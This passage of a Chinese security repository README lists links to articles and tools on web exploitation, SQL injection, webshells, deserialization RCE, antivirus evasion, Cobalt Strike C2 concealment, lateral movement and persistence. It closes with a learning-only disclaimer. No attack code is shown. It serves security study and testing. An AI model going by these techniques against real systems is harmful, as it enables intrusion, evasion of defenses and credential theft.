v3.2.0漏洞复现(getshell+前台SQL注入)](./books/POSCMS%20v3.2.0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(getshell+%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5).pdf)-[原文地址](https://xz.aliyun.com/t/4858) - [多线程+二分法的巧用——通达OA 2017 SQL盲注](./books/%E5%A4%9A%E7%BA%BF%E7%A8%8B+%E4%BA%8C%E5%88%86%E6%B3%95%E7%9A%84%E5%B7%A7%E7%94%A8%E2%80%94%E2%80%94%E9%80%9A%E8%BE%BEOA%20SQL%E7%9B%B2%E6%B3%A8.pdf)-[原文地址](https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g) - [宝塔面板webshell隐藏小技巧](./books/宝塔面板webshell隐藏小技巧.pdf)-[原文地址](https://mp.weixin.qq.com/s/-8JE1ovWKOorNr6MCAgejg) - [配合隐写术远程动态加载 shellcode](./books/%E9%85%8D%E5%90%88%E9%9A%90%E5%86%99%E6%9C%AF%E8%BF%9C%E7%A8%8B%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%20shellcode.pdf)|[原文地址](https://www.t00ls.net/thread-57618-1-1.html) - [MySQL蜜罐获取攻击者微信ID](./books/MySQL蜜罐获取攻击者微信ID.pdf)-[原文地址](https://mp.weixin.qq.com/s/m4I_YDn98K_A2yGAhv67Gg) - [蓝天采集器 v2.3.1 后台getshell(需要管理员权限)](./books/蓝天采集器%20v2.3.1%20后台getshell(需要管理员权限).pdf) - [实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游](./books/实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf)-[原文地址](https://mp.weixin.qq.com/s/JBspfEHTDZBiOXEyI14QKQ) - [0day安全_软件漏洞分析技术(第二版)](https://cloud.189.cn/t/7ziI3imqMzI3) - [安恒信息《渗透攻击红队百科全书》](https://cloud.189.cn/t/Jzeuuq3YFr2e) - [lcx端口转发(详解)](./books/lcx端口转发(详解).pdf) - [php_bugs-PHP代码审计分段讲解](https://github.com/bowu678/php_bugs) - [深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(RCE)](./books/深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(RCE).pdf)-[原文地址](https://mp.weixin.qq.com/s/3TC7TRAFceBWgj_ANA2etQ) - [深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(权限绕过)](./books/深信服edr终端检测响应平台(<3.2.21)代码审计挖掘(权限绕过).pdf)-[原文地址](https://mp.weixin.qq.com/s/4Z4QF-Wdq2PhqCkGKB8Q6Q) - [Hook梦幻旅途之Frida](./books/Hook梦幻旅途之Frida.pdf) - [简单的源码免杀过av](./books/简单的源码免杀过av.pdf) - [duomicms代码审计](./books/duomicms代码审计.pdf) - [劫持got表绕过disable_functions](./books/劫持got表绕过disable_functions.pdf)-[原文地址](https://mp.weixin.qq.com/s/NDkDc7j5rFbcHWTM26zeGQ) - [【代码审计】xyhcms3.5后台任意文件读取](./books/[代码审计]xyhcms3.5后台任意文件读取.pdf)-[原文地址](https://mp.weixin.qq.com/s/hQq7Owew2V_MyCJLKHnR4g) - [CVE-2020-1472 域内提权完整利用](./books/CVE-2020-1472%20域内提权完整利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/RUkGMxM5GjFrEiKa8aH6JA) - [CVE-2020-15148 Yii框架反序列化RCE利用链 exp](./books/CVE-2020-15148%20Yii框架反序列化RCE利用链%20exp.pdf) - [Yii框架反序列化RCE利用链分析](./books/Yii框架反序列化RCE利用链分析.pdf)-[原文链接](https://mp.weixin.qq.com/s/KNhKti5Kcl-She4pU3D-5g)|[Yii 框架反序列化 RCE 利用链 2(官方无补丁)](./books/Yii%20框架反序列化%20RCE%20利用链%202(官方无补丁).pdf)-[原文链接](https://mp.weixin.qq.com/s/h-mbaw3vfHwx2SAZhiDe5Q)|[怎样挖掘出属于自己的 php 反序列化链](./books/怎样挖掘出属于自己的%20php%20反序列化链.pdf)-[原文链接](https://xz.aliyun.com/t/8082) - [Apache 的. htaccess 利用技巧](./books/Apache%20的.%20htaccess%20利用技巧.pdf) - [fastadmin(V1.0.0.20200506_beta) 前台 getshell(文件上传解析) 漏洞分析](./books/fastadmin(V1.0.0.20200506_beta)%20前台%20getshell(文件上传解析)%20漏洞分析.pdf) - [HW2020-0day总结](./books/HW2020-0day总结.pdf) - [Ecshop 4.0 SQL(代码审计从Nday到0day )](Ecshop%204.0%20SQL(代码审计从Nday到0day%20).pdf) - [Yii2框架Gii模块 RCE 分析](./books/Yii2框架Gii模块%20RCE%20分析.pdf) - [Windows操作系统基线核查](./books/Windows操作系统基线核查.pdf) - [phpmyadmin getshell的五种方式](./books/phpmyadmin%20getshell的五种方式.pdf) - [Adminer≤4.6.2任意文件读取漏洞](./books/Adminer≤4.6.2任意文件读取漏洞.pdf)-[原文地址](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ) - [Ueditor最新版XML文件上传导致存储型XSS](./books/Ueditor最新版XML文件上传导致存储型XSS.pdf) - [Nette框架远程代码执行(CVE-2020-15227)-七月火mochazz师傅分析](./books/Nette框架远程代码执行(CVE-2020-15227).md) - [红队技巧:隐藏windows服务](./books/红队技巧:隐藏windows服务.pdf) - [蓝队技巧:查找被隐藏的Windows服务项](./books/蓝队技巧:查找被隐藏的Windows服务项.pdf) - [VHAdmin虚拟主机提权实战案例](./books/VHAdmin虚拟主机提权实战案例.pdf)-[原文地址](https://mp.weixin.qq.com/s/LmXi6niSJ4s-Cmq3jWSjaQ) - [移动安全-APP渗透进阶之AppCan本地文件解密](./books/移动安全-APP渗透进阶之AppCan本地文件解密.pdf)-[原文地址](https://mp.weixin.qq.com/s/ybaiTkHetbbbshH1KZXRaQ) - [【建议收藏】Cobalt Strike学习笔记合集](./books/【建议收藏】CS学习笔记合集%20_%20Teams%20Six.pdf) - [Cobalt_Strike_wiki-Cobalt Strike系列](https://github.com/aleenzz/Cobalt_Strike_wiki) - [Cobalt Strike4.1系列在线手册](https://wbglil.gitbook.io/cobalt-strike/) - [Cobalt Strike 4.2 Manual(cs 4.2英文手册)](./books/Cobalt%20Strike%204.2%20Manual.pdf) - [域渗透之NTML-Hash总结](./books/域渗透之NTML-Hash总结.pdf)-[原文地址](https://ssooking.github.io/yu-shen-tou-zhi-ntml-hash/) - [SQLite手工注入Getshell技巧](./books/SQLite手工注入Getshell技巧.pdf)-[原文地址](https://fuping.site/2017/07/19/SQLite-Injection-Get-WebShell/) - [CVE-2020-1472 NetLogon 特权提升漏洞环境+详细复现步骤](./books/CVE-2020-1472%20NetLogon%20特权提升漏洞.pdf)-[原文地址](https://www.svenbeast.com/post/fu-xian-cve-2020-1472-netlogon-te-quan-ti-sheng-lou-dong/) - [猪哥的读书笔记-主要包括内网安全攻防-渗透测试指南&专注 APT 攻击与防御 - Micro8](https://github.com/zhutougg/book_notes) - [高版本AES-GCM模式加密的Shiro漏洞利用](./books/高版本AES-GCM模式加密的Shiro漏洞利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/otschvw7rJkNH-HsbKkqBA) - [[CVE-2020-14882_14883]WebLogioc console认证绕过+任意代码执行](./books/%5BCVE-2020-14882_14883%5DWebLogioc%20console认证绕过%2B任意代码执行.pdf)-[原文地址](https://mp.weixin.qq.com/s/u8cZEcku-uIbGAVAcos5Tw) - [JNDI注入学习](./books/JNDI注入学习.pdf)-[原文地址](https://www.redteaming.top/2020/08/24/JNDI-Injection/) - [绕过CDN查找真实IP方法总结](./books/绕过CDN查找真实IP方法总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/aSD6kTTOdVgoZXJuqTSqDQ) - [真实IP探测方法大全](./books/绕cdn探测真实ip方法大全.pdf)-[原文地址](https://blog.csdn.net/qq_38265674/article/details/110954257) - [SQL注入简单总结——过滤逗号注入(附绕过tamper)](./books/SQL注入简单总结——过滤逗号注入.pdf)-[原地址](https://www.jianshu.com/p/d10785d22db2) - [绕过WAF的另类webshell木马文件测试方法](./books/绕过WAF的另类webshell木马文件测试方法.pdf)-[源出](https://www.freebuf.com/articles/network/253803.html) - [Android 渗透测试 frida——Brida 插件加解密实战演示](./books/Android%20渗透测试%20frida——Brida%20插件加解密实战演示.pdf)-[源处](https://xz.aliyun.com/t/7562) - [一个由个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup](https://github.com/No-Github/1earn)-[在线版](https://ffffffff0x.gitbook.io/1earn/) - [AndroidSecurityStudy-安卓应用安全学习(主要包括Frida&&FART系列)](https://github.com/r0ysue/AndroidSecurityStudy) - [Mysql注入总结](./books/Mysql注入总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/09VLJjbhKmLZhJdQnvtIvQ) - [ThinkAdmin未授权列目录_任意文件读取(CVE-2020-25540)漏洞复现](./books/ThinkAdmin未授权列目录_任意文件读取(CVE-2020-25540)漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/ORM_6AXz-4jpg1wn82GrLg) - [【免杀技巧】利用加载器以及Python反序列化绕过AV-打造自动化免杀平台](./books/利用加载器以及Python反序列化绕过AV-打造自动化免杀平台.pdf)-[原文地址](https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ) - [bypass-av-note:免杀技术大杂烩---乱拳打死老师傅](https://github.com/Airboi/bypass-av-note) - [Struts2 S2-061漏洞分析(CVE-2020-17530)](./books/Struts2%20S2-061漏洞分析(CVE-2020-17530).pdf)-[原文地址](https://mp.weixin.qq.com/s/RD2HTMn-jFxDIs4-X95u6g) - [CVE-2020-10977-GitLab任意文件读取漏洞复现](./books/CVE-2020-10977-GitLab任意文件读取漏洞复现.pdf)-[原地址](https://mp.weixin.qq.com/s/ZmzXk0C-o0AnBLzVMAhRJg) - [Linux后门N种姿势_fuckadmin](./books/Linux后门N种姿势_fuckadmin.pdf) - [安全修复建议加固方案1.0](./books/安全修复建议加固方案1.0.pdf) - [Web攻防之业务安全实战指南](./books/Web攻防之业务安全实战指南.pdf) - [Linux基线加固方案V1.0](./books/Linux基线加固方案V1.0.pdf) - [php中函数禁用绕过的原理与利用](./books/php中函数禁用绕过的原理与利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/_L379eq0kufu3CCHN1DdkA) - [TP诸多限制条件下如何getshell](./books/TP诸多限制条件下如何getshell.pdf)-[原文地址](https://mp.weixin.qq.com/s/LaTNNjwDT1VzN6uA0Gq0-Q) - [中间件内存马注入&冰蝎连接(附更改部分代码)](./books/中间件内存马注入&冰蝎连接(附更改部分代码).pdf)-[原文地址](https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g) - [用友NC6.5未授权文件上传漏洞分析](./books/X友NC6.5未授权文件上传漏洞分析.pdf) - [钓鱼那些事(初入Office宏攻击)](./books/钓鱼那些事(初入Office宏攻击).pdf)-[原文地址](https://mp.weixin.qq.com/s/FEhpCV5wklOqLmRvMiv20g) - [ZIP已知明文攻击深入利用](./books/ZIP已知明文攻击深入利用.pdf)-[原文地址](https://www.freebuf.com/articles/network/255145.html) - [组件攻击链ThinkCMF高危漏洞分析与利用](./books/组件攻击链ThinkCMF高危漏洞分析与利用.pdf)-[原文地址](https://www.freebuf.com/articles/web/255184.html) - [Struts2 s2-061 Poc分析](./books/Struts2%20s2-061%20Poc分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw) - [内含 POC 丨漏洞复现之 S2-061(CVE-2020-17530)](./books/内含POC丨漏洞复现之S2-061(CVE-2020-17530).pdf)-[原文地址](https://mp.weixin.qq.com/s/uVybuJpkvGt3HCIbfYv1tw) - [Kerberos相关攻击技巧(较全)](./books/Kerberos相关攻击技巧(较全)%20.pdf)-[原文地址](https://xz.aliyun.com/t/8690) - [Intranet_Penetration_Tips-内网渗透TIPS](https://github.com/Ridter/Intranet_Penetration_Tips) - [TimelineSec-2020年漏洞复现大全](https://github.com/TimelineSec/2020-Vulnerabilities) - [Kerberos协议到票据伪造](./books/Kerberos协议到票据伪造.pdf)-[原文地址](https://www.zjun.info/2020/kerberos.html) - [抓取HASH的10001种方法](./books/抓取HASH的10001种方法.pdf)-[原文地址](https://mp.weixin.qq.com/s/6mwms9LtLE6cK0ukpoSMmg) - [C#免杀之自实现DNS服务器传输shellcode](./books/C#免杀之自实现DNS服务器传输shellcode.pdf)-[原文地址](https://xz.aliyun.com/t/8921) - [ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链](./books/ThinkPHP%20v3.2.X%EF%BC%88SQL%E6%B3%A8%E5%85%A5&%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%EF%BC%89%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96POP%E9%93%BE.pdf)-[原文地址](https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA) - [exp-hub-漏洞复现、批量脚本](https://github.com/ybdt/exp-hub) - [sign-逆向app的sign等参数的思路和体验, 安卓逆向, 安卓破解, 逆向app,爬虫解密](https://github.com/darbra/sign) - [Report_Public-DVPNET 公开漏洞知识库](https://github.com/DVPNET/Report_Public) - [DolphinPHP 1.4.2(_1.4.5)后台 GetShell](./books/DolphinPHP%201.4.2(_1.4.5)后台%20GetShell.pdf)-[原文地址](https://www.t00ls.net/thread-59636-1-1.html) - [使用ICMP传递shellcode](./books/使用ICMP传递shellcode.pdf)-[原文地址](https://blog.romanrii.com/using-icmp-to-deliver-shellcode) - [红队技巧:绕过ESET_NOD32抓取密码](./books/红队技巧:绕过ESET_NOD32抓取密码.pdf)-[原文地址](https://mp.weixin.qq.com/s/FaiNEUX2wcscotkyAqUO2Q) - [路由器无限重启救砖之旅](./books/路由器无限重启救砖之旅.pdf)-[原文地址](https://www.anquanke.com/post/id/231493) - [内网渗透测试:MySql的利用与提权思路总结](./books/内网渗透测试:MySql的利用与提权思路总结.pdf)-[原文地址](https://www.freebuf.com/articles/network/261917.html) - [Windows后渗透之权限维持](./books/Windows后渗透之权限维持.pdf)-[原文地址](https://mp.weixin.qq.com/s/Yte_h5Ov_Atz_GHf7rcsIA) - [hackerone-reports_有关hackerone上漏洞奖励前茅的地址,便于学习](https://github.com/reddelexc/hackerone-reports) - [redteam_vul-红队作战中比较常遇到的一些重点系统漏洞整理](https://github.com/r0eXpeR/redteam_vul) - [GetShell的姿势总结](./books/GetShell的姿势总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/LHWZLGW8SohoMDTDhk_cdA) - [SharPyShell后渗透框架使用详解](./books/SharPyShell后渗透框架使用详解.pdf)-[原文地址](https://mp.weixin.qq.com/s/22DUmZUhrMLkAlUP5Sj6EQ) - [向日葵软件在渗透测试中的应用](./books/向日葵软件在渗透测试中的应用.pdf)-[原文地址](https://mp.weixin.qq.com/s/5qzYynZI0bdaUnld0GhA4Q) - [Exchange攻击链 CVE-2021-26855&CVE-2021-27065分析](./books/Exchange攻击链%20CVE-2021-26855&CVE-2021-27065分析.pdf)-[原文地址](https://paper.seebug.org/1501/) - [【.Net代码审计】-.Net反序列化文章](https://github.com/Ivan1ee/NET-Deserialize) - [记一次利用mssql上线(关键词:绕过360,远程下载)](./books/记一次利用mssql上线.pdf) - [vuldebug-JAVA 漏洞调试项目,主要为复现、调试java相关的漏洞](https://github.com/0nise/vuldebug) - [【红蓝对抗】SQL Server提权](./books/%E3%80%90%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97%E3%80%91SQL%20Server%E6%8F%90%E6%9D%83.pdf)-[原文地址](https://mp.weixin.qq.com/s/5LmC_-KK3SMjtxAGG-I4ag) - [Apache Solr组件安全概览(历史漏洞集合)](./books/Apache%20Solr组件安全概览.pdf)-[原文地址](https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ) - [Web安全服务渗透测试模板](./Web安全服务渗透测试模板.docx) - [ThinkPHP v6.0.7 eval反序列化利用链](./books/ThinkPHP%20v6.0.7%20eval%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE.pdf)-[原文地址](https://xz.aliyun.com/t/9310) - [PwnWiki-免费、自由、人人可编辑的漏洞库](https://www.pwnwiki.org/) - [黑蚂蚁外贸网站系统SemCms代码审计思路分享](./books/黑蚂蚁外贸网站系统SemCms代码审计思路分享.pdf) - [LightCMS全版本后台RCE 0day分析](./books/LightCMS全版本后台RCE%200day分析.pdf) - [全球鹰实验室技术文章沉淀](https://www.studysec.com/) - [ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc](./books/ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc.pdf) - [yii2 反序列化写shell方式利用](./books/yii2%20反序列化写shell方式利用.pdf) - [如何制作冰蝎JSP免杀WebShell](./books/如何制作冰蝎JSP免杀WebShell.pdf) - [HVV行动之泛OA流量应急](./books/HVV行动之泛OA流量应急.pdf) - [Java代码执行漏洞中类动态加载的应用](./books/Java代码执行漏洞中类动态加载的应用.pdf) - [记一次tp5.0.24 getshell](./books/记一次tp5.0.24%20getshell.pdf)-[原文地址](https://xz.aliyun.com/t/9112) - [代码审计之youdiancms最新版getshell漏洞](./books/代码审计之youdiancms最新版getshell漏洞.pdf) - [x微E-Cology WorkflowServiceXml RCE](./books/x微E-Cology%20WorkflowServiceXml%20RCE.pdf) - [某通用流程化管控平台编辑器SSRF到axis的RCE之旅](./books/某通用流程化管控平台编辑器SSRF到axis的RCE之旅.pdf) - [手把手教你如何制作钓鱼软件反制红队](./books/手把手教你如何制作钓鱼软件反制红队.pdf) - [记一次绕过火绒安全提权实战案例](./books/记一次绕过火绒安全提权实战案例.pdf) - [Vulnerability-不定期从棱角社区对外进行公布的一些最新漏洞](https://github.com/EdgeSecurityTeam/Vulnerability) - [Webshell之全方位免杀技巧汇总](./books/Webshell之全方位免杀技巧汇总.pdf) - [Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析](./books/Thinkphp%205.0.x_5.1.x%20变量覆盖%20RCE%20漏洞分析.pdf) - [TP5.0.xRCE&5.0.24反序列化分析](./books/TP5.0.xRCE&5.0.24反序列化分析.pdf) - [记一次有趣的tp5代码执行](./books/记一次有趣的tp5代码执行.pdf) - [ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析](./books/ThinkPHP%205.0.0_5.0.23%20RCE%20漏洞分析.pdf) - [记一次tp5.0.24](./books/记一次tp5.0.24.pdf) - [权限维持_Windows内核_驱动断链隐藏技术](./books/权限维持_Windows内核_驱动断链隐藏技术.pdf) - [某邮件系统后台管理员任意登录分析](./books/某邮件系统后台管理员任意登录分析.pdf) - [隐藏CS源IP,提高溯源难度的几种方案](./books/隐藏CS源IP,提高溯源难度的几种方案.pdf) - [CS使用请求转发隐藏真实IP](.books/CS使用请求转发隐藏真实IP.pdf) - [go免杀初探](./books/go免杀初探.pdf) - [记一次绕过防火墙反弹转发姿势小结](./books/记一次绕过防火墙反弹转发姿势小结.pdf) - [内网渗透中如何离线解密 RDP 保存的密码](./books/内网渗透中如何离线解密%20RDP%20保存的密码.pdf) - [Gadgets:Java反序列化漏洞利用链补全计划,仅用于个人归纳总结](https://github.com/0range228/Gadgets) - [Java-Rce-Echo:Java RCE 回显测试代码](https://github.com/feihong-cs/Java-Rce-Echo) - [利用heroku隐藏C2服务器](./books/利用heroku隐藏C2服务器.pdf) - [SQL注入基础整理及Tricks总结](./books/SQL注入基础整理及Tricks总结.pdf) - [利用netplwiz.exe Bypass UAC](./books/利用netplwiz.exe_Bypass_UAC.pdf) - [dscmsV2.0二次注入及任意文件删除漏洞分析](./books/dscmsV2.0二次注入及任意文件删除漏洞分析.pdf) - [脏牛提权复现以及如何得到一个完全交互的shell](./books/脏牛提权复现以及如何得到一个完全交互的shell.pdf) - [在没有执行和写入权限下注入shellcode-Process Injection without Write_Execute Permission](./books/Process20%Injection20%without20%Write_Execute20%Permission20%_20%Ret2Pwn.pdf) - [利用PHAR协议进行PHP反序列化攻击](./books/利用PHAR协议进行PHP反序列化攻击.pdf) - [Seacms代码审计小结(后台多处getshell)](./books/Seacms代码审计小结(后台多处getshell).pdf)-[原文地址](https://xz.aliyun.com/t/9777) - [SpringBoot 框架华夏 ERP 源码审计『java代码审计』](./books/SpringBoot20%框架华夏20%ERP20%源码审计.pdf)|[华夏ERP_v2.3.1最新版SQL与RCE的审计过程](./books/华夏ERP_v2.3.1最新版SQL与RCE的审计过程.pdf) - [盘企LCMS的代码审计『CNVD-2021-28469』](./books/盘企LCMS的代码审计『CNVD-2021-28469』.pdf)-[原文地址](https://xz.aliyun.com/t/9800) - [科迈 RAS4.0 审计分析](./books/科迈20%RAS4.020%审计分析.pdf)-[原文地址](https://xz.aliyun.com/t/9809) - [vulnerability-paper:渗透测试、PTE、免杀、靶场复现、hw、内网后渗透、oscp、等收集文章](https://github.com/MrWQ/vulnerability-paper) - [IoT安全教程系列](https://github.com/G4rb3n/IoT_Sec_Tutorial) - [关于file_put_contents的一些小测试](./books/关于file_put_contents的一些小测试.pdf) - [Discuz渗透总结](./books/Discuz渗透总结.pdf) - [攻击工具分析:哥斯拉(Godzilla)](./books/攻击工具分析:哥斯拉(Godzilla).pdf) - [干货|CS免杀和使用](./books/干货|CS免杀和使用.pdf) - [代码审计之彩虹代刷网系统](./books/代码审计之彩虹代刷网系统.pdf) - [Redis常见漏洞利用方法总结](./books/Redis常见漏洞利用方法总结.pdf)|[Redis系列漏洞总结](./books/Redis系列漏洞总结.pdf) - [加密固件之依据老固件进行解密](./books/加密固件之依据老固件进行解密.pdf) - [Bypass Disable Functions 总结](./books/Bypass%20Disable%20Functions%20总结.pdf) - [施耐德充电桩漏洞挖掘之旅【IOT设备漏洞挖掘】](./books/施耐德充电桩漏洞挖掘之旅.pdf) - [微擎最新版前台某处无回显SSRF漏洞](./books/微擎最新版前台某处无回显SSRF漏洞.pdf) - [SpringMVC配合Fastjson的内存马利用与分析](./books/SpringMVC配合Fastjson的内存马利用与分析.pdf) - [php反序列化逃逸](./books/php反序列化逃逸.pdf) - [手把手教你Windows提权【翻译文章】](./books/手把手教你Windows提权【翻译文章】.pdf) - [免杀转储lsass进程技巧](./books/免杀转储lsass进程技巧.pdf) - [Java内存攻击技术漫谈](./books/Java内存攻击技术漫谈.pdf) - [内网域渗透-WMI 横向移动](./books/内网域渗透-WMI%20横向移动.pdf) - [零起飞CRM管理系统(07FLY-CRM)-代码审计(任意文件删除+RCE+任意文件上传+SQL注入)](./books/%E9%9B%B6%E8%B5%B7%E9%A3%9ECRM%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%EF%BC%8807FLY-CRM%EF%BC%89-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4+RCE+%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0+SQL%E6%B3%A8%E5%85%A5%EF%BC%89.pdf) - [盘企-LCMS代码审计(vv2021.0521152900+v2021.0528154955)](./books/%E7%9B%98%E4%BC%81-LCMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88vv2021.0521152900+v2021.0528154955%EF%BC%89.pdf) - [zzcms2020代码审计](./books/zzcms2020代码审计.pdf) - [Spring渗透合集](./books/Spring渗透合集.pdf) - [Jboss渗透合集](./books/Jboss渗透合集.pdf) - [使用DCOM进行横向渗透](./books/使用DCOM进行横向渗透.pdf) - [Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软](./books/Invoke-Obfuscation-Bypass%20+%20PS2EXE%20%E7%BB%95%E8%BF%87%E4%B8%BB%E6%B5%81%E6%9D%80%E8%BD%AF.pdf) - [python反序列化-分离免杀](./books/python反序列化-分离免杀.pdf) - [JWT安全(总结得很全面)](./books/JWT安全(总结得很全面).pdf) - [Active Directory 证书服务(一)](./books/Active%20Directory%20证书服务(一).pdf) - [CS4.4原版使用手册-csmanual44](./books/csmanual44.pdf) - [tomcat漏洞大杂烩](./books/tomcat漏洞大杂烩.pdf) - [linux suid权限维持速查表](./books/linux%20suid权限维持速查表.pdf) - [从0学习bypass open_basedir姿势](./books/从0学习bypass%20open_basedir姿势.pdf) - [HackerOneReports:hacker历年公开的漏洞报告](https://github.com/aldaor/HackerOneReports) - [从JDBC到h2 database任意命令执行](./books/从JDBC到h2%20database任意命令执行.pdf) - [Confluence Servers RCE 漏洞(CVE-2021-26084)分析](https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md) - [secguide:面向开发人员梳理的代码安全指南](https://github.com/Tencent/secguide) - [JDBC-Attack:当 JDBC Connection URL 可控的情况下,可以做那些攻击](https://github.com/su18/JDBC-Attack) - [从ByteCTF到bypass_disable_function](./books/从ByteCTF到bypass_disable_function.pdf) - [利用安全描述符隐藏服务后门进行权限维持](./books/利用安全描述符隐藏服务后门进行权限维持.pdf) - [理解 Windows 域渗透-Understanding_Windows_Lateral_Movements](./books/理解%20Windows%20域渗透-Understanding_Windows_Lateral_Movements.pdf) - [DLL劫持快速挖掘教程](./books/DLL劫持快速挖掘教程.pdf) - [Bypass_AV - Windows Defender](./books/Bypass_AV%20-%20Windows%20Defender.pdf) - [Chasing a Dream-Pre-authenticated Remote Code Execution in Dedecms](./books/Chasing%20a%20Dream-Pre-authenticated%20Remote%20Code%20Execution%20in%20Dedecms.pdf) - [RMI反序列化及相关工具反制浅析](./books/RMI反序列化及相关工具反制浅析.pdf) - [waf绕过之标签绕过](./books/waf绕过之标签绕过.pdf) - [oracle注入绕狗](./books/oracle注入绕狗.pdf) - [内网学习笔记合集_TeamsSix.pdf](./books/内网学习笔记合集_TeamsSix.pdf.7z) - [CobaltStrike_RedTeam_CheatSheet:一些实战中CS常用的小技巧](https://github.com/wsummerhill/CobaltStrike_RedTeam_CheatSheet) - [CmsEasy代码审计](./books/CmsEasy代码审计.pdf) - [AppCMS_v2.0_代码审计](./books/AppCMS_v2.0_代码审计.pdf) - [记一次曲折的WAF绕过](./books/记一次曲折的WAF绕过.pdf) - [flask_memory_shell:Flask 内存马](https://github.com/iceyhexman/flask_memory_shell) - [Telegram下的C2创建过程](./books/Telegram下的C2创建过程.pdf) - [PbootCms-3.04前台RCE挖掘过](./books/PbootCms-3.04前台RCE挖掘过.pdf) - [pBootCMS 3.0.4 前台注入漏洞复现](./books/pBootCMS%203.0.4%20前台注入漏洞复现.pdf) - [记一次授权测试到顺手挖一个0day(pBootCMS)](./books/记一次授权测试到顺手挖一个0day(pBootCMS).pdf) - [CobaltStrike4.X之去除CheckSum8特征](./books/CobaltStrike4.X之去除CheckSum8特征.pdf) - [JBoss中间件漏洞总结](./books/JBoss中间件漏洞总结.pdf) - [一篇文章带你入门Oracle注入](./books/一篇文章带你入门Oracle注入.pdf) - [DNS Over HTTPS for Cobalt Strike(将 DoH 与 Cobalt Strike 结合使用, 无需第三方帐户或基础设施设置, 使用有效的 SSL 证书加密流量, 并将流量发送到信誉良好的域名)](./books/DNS%20Over%20HTTPS%20for%20Cobalt%20Strike(将%20DoH%20与%20Cobalt%20Strike%20结合使用,%20无需第三方帐户或基础设施设置,%20使用有效的%20SSL%20证书加密流量,%20并将流量发送到信誉良好的域名).pdf) - [鱼跃CMS审计-后台多处文件上传](./books/鱼跃CMS审计-后台多处文件上传.pdf) - [learning-codeql:CodeQL Java 全网最全的中文学习资料](https://github.com/SummerSec/learning-codeql) - [taocms审计](./books/taocms审计.pdf) - [shiroMemshell:利用shiro反序列化注入冰蝎内存马](https://github.com/yyhuni/shiroMemshell) - [浅谈Windows环境下的命令混淆](./books/浅谈Windows环境下的命令混淆.pdf) - [Dump内存得到TeamViewer账号密码](./books/Dump内存得到TeamViewer账号密码.pdf) - [打破基于OpenResty的WEB安全防护(CVE-2018-9230)](./books/打破基于OpenResty的WEB安全防护(CVE-2018-9230).pdf) - [Advanced-SQL-Injection-Cheatsheet:一个有关 SQL 注入的检查 payload 清单](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet) - [MeterSphere PluginController Pre-auth RCE(MeterSphere 匿名接口远程命令执行漏洞分析)](./books/MeterSphere%20PluginController%20Pre-auth%20RCE(MeterSphere%20匿名接口远程命令执行漏洞分析).pdf) - [ClassCMS 2.4代码审计](./books/ClassCMS%202.4代码审计.pdf) - [phpyun人才招聘系统最新版v5.1.5漏洞挖掘](./books/phpyun人才招聘系统最新版v5.1.5漏洞挖掘.pdf) - [CTF中几种通用的sql盲注手法和注入的一些tips](./books/CTF中几种通用的sql盲注手法和注入的一些tips.pdf) ## <span id="head9"> 说明</span> ### 免责声明 > 1.此项目所有文章、代码部分来源于互联网,版权归原作者所有,转载留存的都会写上原著出处,如有遗漏,还请说明,谢谢! > 2.此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任! > 3.如果项目中涉及到你的隐私或者需要删除的,请issue留言指名具体文件内容,附上你的证明,或者邮箱联系我,核实后即刻删除。 <details> <summary>其他杂项</summary> ### 喜讯 在`2020-08-16`登上`GitHub`的`Trending`日榜,谢谢大家支持,谢谢那些在freebuf和公众号推荐的师傅,我会继续努力,期待有靠谱的师傅一起来维护优化,感兴趣的邮箱联系我吧! ![](./img/trending.png) </details> ## Stargazers over time [![Stargazers over time](https://starchart.cc/Mr-xn/Penetration_Testing_POC.svg)](https://starchart.cc/Mr-xn/Penetration_Testing_POC) ### 最后,选一个屁股吧! ![](https://ooo.0o0.ooo/2017/06/13/593fb9335fe9c.jpg)
